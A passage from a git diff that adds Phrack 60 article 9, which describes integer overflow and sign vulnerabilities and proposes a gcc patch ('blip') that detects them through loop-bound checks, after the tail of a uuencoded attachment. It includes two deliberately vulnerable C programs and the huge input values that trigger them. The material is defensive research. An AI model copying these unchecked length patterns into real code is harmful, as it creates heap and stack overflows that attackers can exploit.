+MO7^!WS.7?W'F@_<]^;Q'5GF/77R1_X4GGW_JGUSDGWSH\W]06CV#;=KWT,F/
+MW.-]:(/WNF>^\:L4<LW,76L_\K#WC5_E$1I>?,\S%XVNHBXXJ4)4;/_D,]]X
+M/W>*?_*1]W@?//D=5:T??LD#*@N.>>+//O(>[_Y+CS^^ZOAW-@PO4JF^\:LO
+MY32?6`-V)IZ\\C=6C];`^_N]+<=?HTY@H[5;3K]$#?OJRT^];Z:]Y;U7>^TM
+MC_SF6N[W54^__#%OYH$GC_^/W);[U1@^\]#)9S_VT!?4F,[<</J&;WW(6_>-
+M7ZL\/7P*1K-]_#77JR':`2.5&]W\P"=ORCT\JOR=*OV!SU8^.EQS[T>]AV_X
+MZ$.??\Q[^*&36^Z__"KO[T]\>N^)9^]]ZH_6?>-7__J/UN0>_A"\/99[^*'/
+M/_394Y^;&;_EL9F-[5]^\GGM7SGU\9EQ_]13,Z=^?V:\^.A__DKSU)_.//KG
+M7[G[U!_/^)\Z]2]FQON_])TO_\REJS8^^Y6?48!?G!EO_=)WGKV\L';\N[\?
+MKCV5^WN%4J=1>JB::RL*F_U"57-;@WQNL39JY7K]46[82@?]'FA]__!EZ[TK
+M9EY2N42AT@.?;S_^Q=7MBT'%L/W(UDNNF'G^:R_Q3W[E:Z?>-?.5KY]ZY\RC
+MI[_RWE/'9Q[][E=^^+$9E>QK3WO^%]K^MQ[X3\?_9Z[]^%=6M_\:=N8-'KEQ
+MS%T/-,G->^9OW;OMP/SF)GAE[P\VY_T;<B_S_=SK6\W<GOYR+BCG_'PU'U7S
+MQ=RV^06X7`N\OWOTGJ\,_E`-W5O6>>,7;?GX&M77#YQ\_-3J+?>]HK;N@9-;
+M'GG+NLW>AC]\W1WS;__"^(4?\NZY?.WO[U[WF/?3"EE^=,M#:]ZR;LNS:Y)U
+M6][YBF3=R2^OSI]\PX_?]8?9E0)0>>9GZ;GA9Z>M)9>_])D'2_>O._6)[S[]
+M[,X]"WY1]5U;G6!`RSY7:S3`X1,8X`=/3_;D]%ZWS__40W^Q\Z&G/I3SFN_U
+M5NV[N?F(M^K4G->:7;-AU5]\O?FN-=ZJ.^]ZHOVZ]H?>\XX9K[US=/6I5WI?
+M;O[&S&CMJ9=X7[[[Z:_^QJKQJ?9=3[SN@ZN>?-%]7]MXQ7W?_*W5G_WJ'ZV_
+MZXFOW#-A+`+5X7_IT_3\F4\+^![XYR4ON>*]E[_T\K5J&IYZYM3%WJD;O9<^
+MT?SXFBL\[X-7_?:&)S<T3[QDO7?/=S>,GO_LFC^^Y#'O14]N>/6+QI<TGU51
+M`/+$!R_*GX9HSU<IKL#XJ[WF(VN\5Z\=JVGV7R_Q'FV]]^VKFX]L\-[[)Y=<
+M<G*TOGG?*]9ZS?==[CWQZ`OO><T?7^*-UK3>\[;5SYY$&"S2WH'W_]B//7RN
+MQ5SH?[%:L?)M8.6_<]#_/KX+_1\4@?XO%R[0__\@O\=.KN6E]$-J+?[6#:>?
+M^<:O_?4+/>_ACWSSM6KY_,R)9Q[ZBP\?]5[2_(/R;ZUY_3=^+7[IQ^=6;VR>
+M>&WS@1VK?O\/9C[PBX\\,7/OLY^:22][M__9#WNK'IM9I7:>4X30'[K$^^VU
+M__Y3,X_-//?)#6I-^_W/>2=6^R?SGWWRN2KJ>[X^<__E3\S\R*71)Y<O?J]Z
+M67WJ)[Q]IQ[Q[KQ^S==GQE]<\C:L/57V3CU_YM37O/<^,W/)R?&U][_DB9G'
+MUJTZ_MTK1AL>O?;X=Z\:7?)H[OAW-XY6/>H]\LS,7P,'D5KVP,E_<?J*\;/^
+M%TZ_)+=J=LTW9Y9GGL!"3CS^^%]<,O,GZ24C-6%O^/SCIRZ!*;O9>_J/[[[[
+ML2V7?WBM]^2&VOT+J^^_=.M]?W3_PJK[_OC>+WDS'URU_W7S^U33;CS^L76U
+M)TX\?M'JV35/S(PO4\WRMZ\:7W1ZNVK9B=60]Q^FESQP\IZ/;7CHI/^%)_:=
+MNM3+?QF:?/QCZVM/_],/7>R=^*O7J27HGN]<G%[QV-SEUW_RR0V/WJG^JD]N
+M./X'JTY=[MWUI3]_XK'+%,GTZ/HG-SSQH=7>_7=XCW]T]6-77)[[S.J'7WGU
+MS:]\<L.7_N<3U)%JLF^\ZHI++EN_JX^&1LXQX.#<"ACBN)`=>#_/__US6[?O
+MGOL!X=@YYG^^')1P_JMH05@JJ/A^.<A?F/__$+^%I21%HS9+K5S:'P\;:&8'
+MON87MB[LW+;Y]KG]>^9V;=ZY>^N.N<W[MBYLNVWGGAVY9K\Q!IF1+>O7Y_BW
+M.7>P/GKS4C?W:GK>G":]&LB6O,:*H@B2%GC91"ID_7I5%//<L<C!L+\XK'77
+M7_(R<$0T$4S&>CA4OM:;$&C'03!B!`(M_9Y`UZ]''+?\/Y(E')71EAL)_[>D
+M2[D;80N\<;D+U-V;.>V6/F3?RQWKCW-'DDXGM]@:Y6JY7NM(3BP-`:\\E_1R
+MC?%PJ#HDUTR&:(/GV);U1UJ=SB9(VJCU<J.6JE@RR@%[-E<_ENLDG3Z8*5H<
+MCNOKU]_2:M14"%CIJ25-'`*(7U/'HE9S3-)^N2V)RAV-0767(2L>*'"$[C;L
+M#+:>IOUX_NMN^$'@V-GM/\-N'_#^7RH6\F78_TO%\H7Y_P_Q>]D/WUA/>C>F
+M2^O7WXZS^Z;K9%)<MW[_UM?'-/]O(OQ:_V/RO=&$7;=E\<W7K=^U<\_M-UW'
+M_E4[O4/7K9^_:WYA;G>\>^N^FZZCR47&N+9T:X/KUL_=*5E=QU/INO5[;_G1
+M;7OWW773=?WZP49_<"RW>6].U:XV5&_[<RB>AB\LL);;/'_=>M0[ATKCY97Z
+MWKMW87YNVX+*5FA:596YA0.J%L3E5G55"2#N^J2=>T-NX\MRFWNM7)![$T[V
+M]9>T&DO]W'5DV6UC/O=J:A1.K=?D7DTKPVNN4_&.JDGHKV\GZ]=OI,[+;?1S
+M&]6ZAEZ%-[=SFRLYJZ/6C[J#0;*X>.RF6+W%&]4//]=OW+4]MWF8V]S/;=PH
+M<;;T<YOKTOJ-TN\`:W7:A0#5ZW.;%W(;H>-G*8L%N)W,Y8^2<8?<YE8.;W7&
+M@[@09'(_FEMJU9JJ$/2GYQ:LFL,CX::PXXQ'*A;V/51IH_1Z;B-V=29JCLW<
+MO2:W40_[^O7#KENJ^WTT&ZY*!(CTQ'FL<1=^9_[)^J_G[0^@C'/1?WZI).<_
+M7QT`5?R"(@0OK/__$#^8M#OW[IG/_:,<2A/GJNI-NSC,W93;,IO;M7?/CNN-
+MLT.X;U:DG`'<8+U3BE==OR4;@*DP\"UON3!W+_PN_"[\+OPN_"[\+OPN_"[\
+M+OPN_"[\+OPN_"[\+OPN_"[\+OPN_"[\+OPN_"[\+OPN_"[\+OPN_"[\OJ^_
+*_Q^/V/4P`-@$````
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/9.txt b/phrack60/9.txt
new file mode 100644
index 0000000..6a4f84b
--- /dev/null
+++ b/phrack60/9.txt
@@ -0,0 +1,2295 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x09 of 0x10
+
+
+|=-------------------=[ Big Loop Integer Protection]=------------------=|
+|=---------------------------------------------------------------------=|
+|=--------------=[ Oded Horovitz ohorovitz@entercept.com ]=------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Part I - Integer problems
+    2.1 - Introduction
+    2.2 - Basic code samples
+
+  3 - Part II - Exploitation pattern
+    3.1 - One input, two interpretations
+    3.2 - What is the nature of the input?
+    3.3 - Suggested detection
+
+
+  4 - Part III - Implementation
+    4.1 - Introduction 
+    4.2 - Why gcc?
+    4.3 - A bit about gcc
+        4.3.1 - Compilation flow 
+        4.3.2 - The AST
+        4.3.3 - Getting started 
+    4.4 - Patch Goals 
+    4.5 - Patch overview
+        4.5.1 - Tactics
+        4.5.2 - Modifying the AST
+    4.6 - Limitations
+
+  5 - References
+
+  6 - Thanks
+
+  7 - Appendix A - Real life examples
+    7.1 - Apache Chunked encoding
+    7.2 - OpenSSH auth
+  
+  8 - Appendix B - Using blip  
+
+--[ 1 - Introduction
+
+Integer overflow and integer sign vulnerabilities are now common 
+knowledge. This has led to increased exploitation of integer-related 
+vulnerabilities. The article will attempt to suggest a way to detect 
+these vulnerabilities by adding compiler support that detects and flags 
+integer vulnerabilities exploitations. Specifically a gcc patch is 
+presented to demonstrate the feasibility of this technique.
+
+The article is divided into three parts. Part one contains a brief 
+introduction to some of the common integer related vulnerabilities. We 
+list some of the recent public vulnerabilities. Part two of the article 
+tries to explain the root cause of the problem with integer 
+vulnerabilities. Using real examples, the article explains why 
+exploitation is possible in the first place, and how it may be possible 
+to detect exploitation of integer vulnerabilities, even when the 
+vulnerability is not known in advance. Part three goes through the 
+implementation of the suggested detection scheme. Since the 
+implementation of this detection scheme is in the form of a gcc patch, 
+introduction information about gcc internals is provided as well. We 
+summarize the paper by demonstrating the protection at work against 
+OpenSSH and the Apache httpd packages.
+
+--[ 2 - Part I - Integer problems
+
+----[ 2.1 - Introduction
+
+In the last year the attention seems to have shifted to a new bad 
+programming practice. This practice is related to the possibility to 
+integer overflows that cause buffer overflows. It turns out the many 
+popular and (assumed to be) secure software packages (OpenSSH, Apache, 
+*BSD kernel) share this vulnerability. The root cause for this bad 
+practice is insufficient input validation for integer type input. Integer 
+input looks so naive, only a few bits long. What can go wrong here? Well, 
+it seems that quite a lot can go wrong. The following is a table of 
+integer related vulnerabilities taken from the OpenBSD and FreeBSD 
+security lists. All vulnerabilities have been reported during year 2002. 
+
+-------------------------------------------------------------------------
+| Vulnerable package     | Short description of vulnerability           |
+-------------------------------------------------------------------------
+| OpenBSD select syscall | Positive limit checks against int value      |
+| (See reference [4])    | allowing stack overflow                      |
+-------------------------------------------------------------------------
+| RPC xdr_array          | Int overflow cause small buffer allocation   |
+|                        | which later overflowed with input            |
+-------------------------------------------------------------------------
+| OpenSSH Authentication | Int overflow cause small buffer allocation   |
+|                        | which later overflowed with input            |
+-------------------------------------------------------------------------
+| Apache chunked-encoding| Positive condition is done on signed int     |
+|                        | allowing heap overflow                       |
+-------------------------------------------------------------------------
+| FreeBSD get_pallette   | Positive condition is done on signed int     |
+|                        | allowing information leak from kernel to user|
+-------------------------------------------------------------------------
+| FreeBSD accept1,getsoc-| Positive condition is done on signed int     |
+| kname1,getpeername1    | allowing information leak from kernel to user|
+-------------------------------------------------------------------------
+ Table 1 - Sample integer vulnerabilities in year 2002.
+
+The common problem that exists in all of the above vulnerabilities is 
+that an input of integer type (signed and unsigned) was used to trigger 
+overflow (when writing) or info leak (when reading) to/from program 
+buffers. All of the above vulnerabilities would have been prevented if 
+proper limits had been enforced. 
+
+----[ 2.2 - Basic code samples
+
+Integer vulnerabilities can be further illustrated by looking at the 
+following two simple code samples. 
+
+Example 1 (int overflow): 
+-------------------------
+01	int main(int argc,char* argv[]){
+
+02		unsigned int len,i;
+03		char	*buf;
+		
+04		if(argc != 3) return -1;
+		
+05		len=atoi(argv[1]);
+
+06		buf = (char*)malloc(len+1);
+07		if(!buf){
+08			printf("Allocation faild\n");
+09			return -1;
+10		}
+		
+11		for(i=0; i < len; i++){
+12			buf[i] = _toupper(argv[2][i]);
+13		}	
+14		buf[i]=0;
+		
+15		printf("%s\n",buf);
+16	}
+
+The code above seems quite legit. The program converts a string to its 
+upper case representation. First it allocates enough space for the string 
+and the NULL termination character. Then it converts each character into 
+its upcase value. But when looking a bit closer, we can identify two 
+major problems in the code. First, the program trusts the user to have as 
+much characters as he specifies (which is obviously not the case)(line 
+5). Second, the program doesn't take into account that by calculating the 
+space to allocate, an integer overflow may occur (line 6). Trying to 
+generalize the problem, the first bug may allow the attacker to read 
+information, which he didn't provide (by trusting the user input and 
+reading *len* chars from argv[2]). The second bug allows the attack to 
+overflow the heap with its own data, and therefore to fully compromise 
+the program.
+
+
+Example 2 (sign check-bypass):
+------------------------------
+01	#define BUF_SIZE 10
+02	int	max = BUF_SIZE;
+
+03	int main(int argc,char* argv[]){
+
+04		int		len;
+05		char	buf[BUF_SIZE];
+		
+06		if(argc != 3) return -1;
+		
+07		len=atoi(argv[1]);
+
+08		if(len < max){
+09			memcpy(buf,argv[2],len);
+10			printf("Data copied\n");
+11		}
+12		else
+13			printf("Too much data\n");
+		
+		
+14	}
+
+The second example shows a program that had the intention to solve the 
+problem introduced in the first example, by attempting to enforce user 
+input length to a known and predefined maximum value. The problem in this 
+code is that len is defined as a signed int. In this case a very big 
+value (unsigned wise) is interpreted as a negative value (line 8), which 
+will bypass the limit check. Still, in line 9 the same value is 
+interpreted as an unsigned positive number causing a buffer overflow and 
+possibly allowing a full compromise.
+
+--[ 3 - Part II  - Exploitation pattern
+
+----[ 3.1 - One input, two interpretations
+
+So what is the real problem? How come such security-oriented packages 
+have these vulnerabilities? The answer is that integer inputs sometimes 
+have an ambiguous interpretation at different parts of the code (integer 
+may change their sign at different values, implicit type cast, integer 
+overflows). That ambiguous interpretation is hard to notice when 
+implementing input validation code.
+
+To explain this ambiguity let us look at the first example. At the time 
+of allocation (line 6), the code believes that since the input is a 
+number, then adding another number will yield a bigger number (len+1). 
+But since typical C language programs ignore integer overflows the 
+particular number 0xffffffff do not apply to this assumption and yields 
+unexpected result (zero). Unfortunately the same error is *NOT* repeated 
+later in the code. Therefore the same input 0xffffffff this time 
+interpreted as an unsigned value (a huge positive number). 
+
+In the second example the ambiguity of the input is even more obvious. 
+Here the code includes a silent type casting generated by the compiler 
+when calling memcpy. The code therefore is checking the value of the 
+input as if it was a signed number (line 8) while using it to copy data 
+as if it was an unsigned (line 9). 
+
+This ambiguity is invisible for the coder eye, and may go undetected, 
+leaving the code vulnerable to this "stealthy" attack.
+
+----[ 3.2 - What is the nature of the input?
+
+Looking back at the above examples reveal a common meaning for the 
+attacker input. (Sorry if the next few lines will explain the obvious :>) 
+The above input is a number for a reason. It is a counter! It counts 
+items! It doesn't matter what those "items" are (bytes, chars, objects, 
+files, etc.). They are still countable amount of items. And what can you 
+do with such a counter? Well, you are most likely to do some processing 
+"count" amount of times. As a note I will say that not *every* number is 
+also a counter. There are many other reasons to have numbers around. But 
+the one that are related to integer vulnerabilities happend to be 
+"counters" most of the time.
+
+For example, if the count is for challenge response you may want to read 
+"count" amount of responses (OpenSSH). Or if the count is buffer length 
+you may want to copy "count" amount of bytes from one memory location to 
+the other (Apache httpd). 
+
+The bottom line is that somewhere behind this number there is the proper 
+"loop" in the code that will do some processing, "count" number of times. 
+This "loop" may have multiple forms such as the for-loop in the first 
+example, or as an implicit loop in memcpy. Still all loop flavors will 
+end up looping around the "count".
+
+----[ 3.3 - Suggested detection
+
+Ok, what do we have so far about those vulnerabilities?
+- The input was ambiguously used in the code.
+- Somewhere in the code there is a loop that uses the input integer as an 
+iteration counter. 
+
+To make the interpretation of the number ambiguous, the attacker has to 
+send a huge number. Looking at the first example we can see that in order 
+to make the number ambiguous the attacker needed to send such a big 
+number that if doing (len+1) the number will overflow. For that to happen 
+the attacker will have to send the value 0xffffffff. Looking at the 
+second example, in order to make the interpretation of the number 
+ambiguous, the attacker needs to send such a number that will fall into 
+the negative range of an integer 0x80000000-0xffffffff. 
+
+The same huge number sent by the attacker to trigger the vulnerability is 
+later used in a loop as the iterations counter (As discussed in the 
+section "What is the nature of the input?") 
+
+Now lets analyze the exploit process:
+
+1. Attacker wants to overflow buffer.
+2. Attacker may use integer vulnerability
+3. Attacker sends a huge integer to trigger the vulnerability.
+4. Count loop executes (probably) using attacker input as the loop bound.
+5. A Buffer is overflowed (On early iterations of the loop!)
+
+Therefore detecting (and preventing) integer vulnerability exploitation 
+is possible by validating the loop bounds before its execution. The 
+validation of the loop will check that the loop limit is not above a 
+predefined threshold, and if the limit is higher that the threshold a 
+special handler will be triggered to handle the possible exploitation. 
+
+Since the value required to trigger most integer vulnerabilities is huge, 
+we can assume (hope) that most legitimate loops will not trigger this 
+protection.
+
+To get a feeling for what values we expect to see in integer 
+Vulnerabilities, lets examine the following samples:
+
+- Allocating buffer for user data + program data
+
+Looks like: buf = malloc(len + sizeof(header));
+
+In this case the value required for triggering int overflow is very close 
+to 0xffffffff since most program struct sizes are in the range of several 
+bytes to hundreds bytes at most.
+
+- Allocating arrays
+
+looks like: buf = malloc(len * sizeof(object));
+
+In this case the value required for triggering the overflow may be much 
+smaller then in the first example but it is still a relatively huge 
+value. For example if sizeof(object) == 4 then the value should be bigger 
+then 0x40000000 (one Giga). Even if the sizeof(object)== 64 the value 
+should be bigger then 0x4000000 (64 Mega) in order to cause an overflow.
+
+- Falling to negative range
+
+In this case the value required to make a number negative is any number 
+bigger then 0x7fffffff. 
+
+
+Looking at the values required to trigger the integer vulnerability, we 
+can choose a threshold such as 0x40000000 (One Giga) that will handle 
+most cases. Or we can select smaller threshold for better protection, 
+which may trigger some false positives.
+
+--[ 4 - Part III - Implementation
+
+----[ 4.1 - Introduction 
+
+Once we have a suggested a way to detect integer attacks, it will be nice 
+to implement a system based on that idea. A possible candidate for 
+implementing this system is to extend an existing compiler. Since the 
+compiler knows about all loops in the application, it will be possible 
+for the compiler to add the appropriate security checks before any "count 
+loop". Doing so will secure the application without any knowledge of the 
+specific vulnerability.
+
+Therefore I choose to implement this system as a gcc patch and name it 
+"Big Loop Integer Protection" a.k.a blip. Using the -fblip flag one may 
+now be able to protect his application from the next yet to be public 
+integer exploit.
+
+----[ 4.2 - Why gcc?
+
+Choosing gcc was not a tough decision. First this compiler is one of the 
+most common compilers in the Linux, *nix world. Therefore, patching gcc 
+will allow protecting all applications compiled with gcc. Second, the 
+gcc is open-source therefore it may be feasible to implement this patch 
+in the first place. Third, previous security patches were implemented as 
+gcc patches (StackGaurd, ProPolice).So why not follow their wisdom? 
+
+----[ 4.3 - A bit about gcc
+
+Well.., all happy I set down knowing that I'm about to make a gcc patch 
+for preventing integer attacks. But, except of that, what do I really 
+know about gcc at all? I must admit that the answer for that question was 
+- "not much". 
+
+To overcome this little problem, I was looking for some documentation 
+about gcc internals. I also hoped to find something similar to what I 
+wanted to do, which already exists. Fast enough, it was clear that before 
+jumping to other examples, I must understand the gcc beast. 
+
+.. Two weeks later, I have read enough of the gcc internal documentation, 
+and I spent enough time in debugging sessions of the compiler, to be able 
+to start modifying the code. However before I start jumping into details 
+I would like to provide some background about how gcc works, which I hope 
+the reader will find useful.
+
+------[ 4.3.1 - Compilation flow 
+
+The gcc compiler is really an amazing machine. The design goals of gcc 
+include the ability to support multiple programming languages, which 
+later can be compiled into multiple platforms and instruction sets. In 
+order to achieve such a goal, the compiler uses several abstraction 
+layers. 
+
+At first, a language file is processed (parsed) by a language "Front 
+End". Whenever you invoke the gcc compiler, the compiler will decide 
+which of the available "Front End"s is good for parsing the input files, 
+and will execute that  "Front End". The "Front End" will parse the whole 
+input file and will convert it (using many global helper functions) to an 
+"Abstract Syntax Tree" (AST). By doing so the "Front End" makes the 
+original programming language transparent to the gcc "Back End". The AST 
+as its name suggests, is a data-structure, which resides in memory and 
+can represent all the features of all the programming languages gcc 
+supports. 
+
+Whenever the "Front End" finishes to parse a complete function, and 
+converts it to an AST representation, a gcc function called 
+rest_of_compilation is being called. This function takes down the AST 
+output from the parser and "expands" it into a "Register Transfer 
+Language" (RTL). The RTL, which is the "expanded" version of the AST, is 
+then processed again and again through the many different phases of 
+compilation. 
+
+To get a feeling for work that is done on the RTL tree, a subset 
+list of the different phases is:
+ - Jump Optimization
+ - CSE (Common sub-expression elimination)
+ - Data flow analysis
+ - Instruction combination
+ - Instruction scheduling
+ - Basic block reordering
+ - Branch shortening
+ - Final (code generation)
+
+I've selected only a few phases out of the big list of phases to 
+demonstrate the work done on RTL. The full list is quite more extensive 
+and can be found in the gcc internal docs (see "Getting started" for link 
+to docs). The nice thing about RTL is that all those phases are performed 
+independent of the target machine. 
+
+The last phase which is performed on the RTL tree, will be the "final" 
+phase. At that point the RTL representation is ready to be substituted by 
+actual assembly instructions that deal with the specific architecture. 
+This phase is possible due to the fact that the gcc maintains an abstract 
+definition of "machine modes". A set of files that can describe each 
+supported machine hardware, and instruction set in a way that makes it 
+possible to translate RTL to the appropriate machine code.
+
+
+------[ 4.3.2 - The AST
+
+I will now focus on the AST, which I will refer to as the "TREE". This 
+TREE is the output of the front end parsing of a language file. The TREE 
+contains all the information existing in the source file which is 
+required for code generation (e.g. declaration, functions, types..). In 
+addition the TREE also includes some of the attributes and implicit 
+transformations that the compiler may choose to perform (e.g. type 
+conversion, auto variables..). 
+
+Understanding the TREE is critical for creating this patch. Fortunately 
+the TREE is well structured and even if its object-oriented-like-
+programming-using-c is overwhelming at first, after a few debugging 
+sessions, every thing starts to fall in place. 
+
+The core data structure of the TREE is the tree_node (defined in tree.h). 
+This structure is actually one big union that can represent any piece of 
+information. The way it works is that any tree node has its code, which 
+is accessible using "TREE_CODE (tree node)". Using this code the compiler 
+may know which of the union fields are relevant for that node (e.g. A 
+constant number will have the TREE_CODE() == INTEGER_CST, therefore the 
+node->int_cst is going to be the union member that will have the valid 
+information.). As a note, I will say that there is no need to access any 
+of the tree node structure fields directly. For each and every field in 
+that structure there is a dedicated macro that uniforms the access to 
+that field. In most cases this macro will contain some additional checks 
+of the node, and maybe even some logic to execute whenever access to that 
+field is made (e.g. DECL_RTL which is responsible to retrieve the RTL 
+representation of a TREE node, will call make_decl() if no RTL expression 
+exists for that node).
+
+So we know about the TREE and tree node, and we know that each node can 
+represent many different things, what else is important to know about the 
+tree nodes? Well, one thing is the way tree nodes are linked to each 
+other. I will try to give a few sample scenarios that represent most of 
+the cases where one tree node is related to another one.
+
+Reference I - Chains:
+A chain is a relation that can be best described as a list. When the 
+compiler needs to maintain a list of nodes *that don't have any link-
+related information*, it will simply use the chain field of the tree node 
+(accessible using the TREE_CHAIN() macro). An example for such a case is 
+the list of statements nodes in a function body. For each statement in a 
+COMPOUND_STMT list there is a chained statement that represents the 
+following statement in the code.
+
+Reference II - Lists:
+Whenever simple chaining is not enough, the compiler will use a special 
+tree node code of TREE_LIST. TREE_LIST allows the compiler to save some 
+information attached to each item on the list. To do so each item in the 
+list is represented by three tree nodes. The first tree node will have 
+the code TREE_LIST. This tree node will have the TREE_CHAIN pointing to 
+the next node in the list. It will have the TREE_VALUE pointing to the 
+actual tree node item, and it will also have TREE_PURPOSE which may point 
+to another tree node that holds extra information about this item meaning 
+in the list. As an example the tree node of code CALL_EXPR, will have a 
+TREE_LIST as its second operand. This list will represent the parameters 
+sent to the called function.
+
+Reference III - Direct reference:
+Many of the tree node fields are tree nodes themselves. It may be 
+confusing at first glance, but it will be clear soon enough. A few common 
+examples are:
+ - TREE_TYPE this field represent the type of a tree node. For example 
+each tree node with expression code must have a type. 
+
+ - DECL_NAME whenever some declaration tree nodes have a name, it will 
+not exist as a string pointed directly by the declaration tree node. 
+Instead using the DECL_NAME one can get access to another tree node of 
+code IDENTIFIER_NODE. The latter will have the requested name 
+information.
+
+ - TREE_OPERAND() One of the most commonly used references. Whenever 
+there is a tree node, which has a defined number of "child" tree nodes, 
+the TREE_OPERAND() array will be used (e.g. tree node of code IF_STMT 
+will have TREE_OPERAND(t,0) as a COND_EXPR node, TREE_OPERAND(t,1) as the 
+THEN_CLAUSE statement node, and TREE_OPERAND(t,2) as the ELSE_CLAUSE 
+statement tree node.)
+
+Reference IV - Vectors:
+Last and quite less common is the tree node vector. This container, which 
+is accessible using the TREE_VEC_XXX macros, is used to maintain varying 
+size vectors.
+ 
+There is a lot more to know about AST tree nodes for which the gcc 
+internal documents may have better and more complete explanations. So I 
+will stop my AST overview here with a suggestion to read the docs.
+
+In addition to storing the abstract code in the AST. There are several 
+global structures, which are being extensively used by the compiler. I 
+will try to name a few of those global structures that I found very 
+useful to checkout while doing some debugging sessions.
+
+  - current_stmt_tree : provides the last added stmt to the tree , last 
+expression type, and the expression file name.
+
+  - current/global_binding_level : provides binding information, 
+such as defined names in a particular binding level, and block pointers
+
+  - lineno : var containing the line number that is parsed at the moment
+  - input_filename: file name that is parsed at the moment
+
+------[ 4.3.3 - Getting started 
+
+If you want to experience the AST tree yourself, or to dig into the patch 
+details, it is recommended to read this getting started section. You are 
+safe to continue to the next section if you do not wish to do that.
+
+First thing first, get the compiler source code. The version I used as 
+base for this patch is gcc 3.2. For information about download and build 
+of the compiler please check http://gcc.gnu.org/install/ 
+
+(Please remember to specify the compiler version you wish to download. 
+The default version may be the last-release, which was not checked 
+against this patch)
+
+Next thing you may want to do is to sit down and carefully read the gcc 
+internal documents. ( For the sake of this patch, you should be familiar 
+with the first 9 sections of this document ) The document is located 
+http://gcc.gnu.org/onlinedocs/gccint/
+
+Assuming you read the document and you want to go to the next level, I 
+recommend to have a set of simple programs to be used as compiler 
+language file, your debugger of choice, and start debugging the compiler. 
+Some good break points that you might find useful are:
+
+  - add_stmt : called whenever the parser decides to add a new statement 
+into the AST. This break point may be very handy when it is not so clear 
+how a specific tree node is being created. By breaking on add_stmt and 
+checking up the call stack, it is easy to find more interesting places to 
+dig into.
+
+  - rest_of_compiliation : called whenever a function was completely 
+converted into AST representation. If you are interested to check out how 
+the AST is turning into RTL this is a good place to start.
+
+  - expand_stmt: called each time a statement is about to be expanded 
+into RTL code. Setting a Break point here will allow you to easily 
+investigate the structure of an AST tree node without the need to go 
+through endless nesting levels. 
+
+<TIP> Since the gcc compiler will end up calling the cc1 compiler for *.c 
+files, you may want to debug cc1 in the first place, and save yourself 
+the trouble of making your debugger follow the child process of gcc 
+</TIP>
+
+Soon enough you will need some reference for all the little macros used 
+while messing with the AST tree. For that I recommend getting familiar 
+with the following files:
+
+gcc3.2/gcc/gcc/tree.h
+gcc3.2/gcc/gcc/tree.def
+
+
+----[ 4.4 - Patch Goals 
+
+
+Like every project in life, you have to define the project goals.  First 
+you better know if you reached your goals. Second, which is not less 
+important, since resources are limited, it is much easier to protect 
+yourself from a never-ending project. 
+
+The goals of this patch were above all to be a proof of concept for the 
+suggested integer exploits prevention scheme. Its therefore *not* a goal 
+to solve all current and future problems in the security world, or even 
+not to solve all exploits that have integer input related to them.
+
+The second goal of this implementation is to keep the patch simple. Since 
+the patch is only a proof of concept, we preferred to keep things simple 
+and avoid fancy solutions if they required more complex code. 
+
+
+Last but not least the third goal is to make this patch usable. That 
+means easy to use, intuitive, and able to protect real world packages 
+bigger then 30 lines of code :).
+
+----[ 4.5 - Patch overview
+
+The patch will introduce a new flag to the gcc compiler named "blip". By 
+compiling a file using the -fblip flag,  the compiler  generates code 
+that will check for the "blip" condition for every for/while loop and for 
+every call to a "loop like" function.
+
+A "loop like" function is any function that is a synonym for a loop. 
+(e.g. memcpy, bcopy, memset, etc.).
+
+The generated check, will evaluate if a loop is about to execute a "Huge" 
+number of times. (defined by LIBP_MAX). Each time a loop is about to 
+execute, the generated code verifies that the loop limit is smaller than 
+the threshold. If an attempt to execute a loop more than the threshold 
+value is identified, the __blip_violation() handler will be called 
+instead of the loop, leading to a controlled termination of the 
+processes.
+
+The current version of the patch will support only the C language. This 
+decision was made in order to keep this first version of the patch small 
+and simple. Also, all the vulnerable packages that this patch was planned 
+to protect are written in C. So I thought that having only C is a good 
+start.
+
+
+------[ 4.5.1 - Tactics
+
+Having the above goals in mind, I had to take some decisions during the 
+development of the patch. One of the problems I had was to choose the 
+right place to hack the code. There are quite a lot of options available, 
+and I will try to give some pros and cons for each option, hoping it will 
+help others to make educated decisions once they encounter the same 
+dilemmas.
+
+The first thing that I had to decide was the program representation I 
+want to modify. The process of compilation looks more or less like that:
+
+Processing		Program representation
+------------		------------
+Programming =>	1. Source code
+Parsing => 		2. AST
+Expanding => 	3. RTL
+"final" =>		4. Object file
+
+So what is the right place to implement the checks? 
+
+The following table lists some of the pros and cons for modifying the 
+code at different stages during the compilation process.
++-------------+-----------------------------+---------------------------+
+|Stage        |Pros                         | Cons                      |
++-------------+-----------------------------+---------------------------+
+| AST         |- Target independent         |- No access to hardware    |
+|             |- Language independent       |  Registers, instructions  |
+|             |- Optimization independent   |                           |
+|             |- High level Access to       |                           |
+|             |  language "source"          |                           |
+|             |- Intuitive to add code      |                           |
++-------------+-----------------------------+---------------------------+
+| RTL         |- Target independent         |- Low level "source" access|
+|             |- Language independent       |- May interfere with       |
+|             |- Full access to target      |  optimization             |
+|             |  hardware                   |                           |
++-------------+-----------------------------+---------------------------+
+| Object file |- Language independent       |- Hardware dependent       |
+|             |                             |- Lack syntax information  |
+|             |                             |- Modification of flow may |
+|             |                             | break compiler logic      |
++-------------+-----------------------------+---------------------------+
+
+After some thought I decided to modify the AST representation. It seems 
+to be the most natural place to do such a change. First, the patch 
+doesn't really need to access low-level information such as hardware 
+registers, or even virtual registers allocations. Second, the patch can 
+easily modify the AST to inject custom logic into it, while doing the 
+same at the RTL level will require major changes, which will hurt the 
+abstraction layers defined in gcc.
+
+
+Solving my second dilemma was not as easy as the first one. Now that AST 
+patching was the plan I had in mind, I needed to find the best point in 
+time in which I will examine the existing AST tree, and emit my checks on 
+it. I had three possible options. 
+
+1) Add a call to my function from the parser code of some language (which 
+happened to be C).  By doing so, I have the chance to evaluate and modify 
+the tree "on the fly" and therefore save an extra pass over the tree 
+later. A clear disadvantage is the patch becomes language dependent. 
+
+2) Wait until the whole function is parsed by the front-end.  Then go 
+through the created tree, before converting it to RTL and find the 
+places, which require checks, and patch them. An advantage of this method 
+is that the patch is no longer language dependent. On the other hand, 
+implementing a "tree walk" that will scan a given tree, is quite complex 
+and error prone task, which will go against the goals we defined above 
+such as simple, and useful patch. 
+
+3) Patch the AST tree *while* it is being converted into RTL. Although 
+this option looks like the most advantageous (language independent, no 
+need for a tree walk) it still has a major disadvantage which is the 
